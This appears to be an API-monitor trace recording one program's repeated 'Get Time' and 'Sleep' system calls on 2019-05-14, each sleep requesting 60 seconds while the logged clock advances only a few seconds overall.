System	Get Time	type = System Time, time = 2019-05-14 15:33:51 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:51 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:51 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:51 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:51 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:51 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:51 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:54 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:55 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:56 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:56 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:56 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:56 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:56 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:58 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:33:59 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:34:00 (UTC)	1	Fn
System	Sleep	duration = 60000 milliseconds (60.000 seconds)	1	Fn
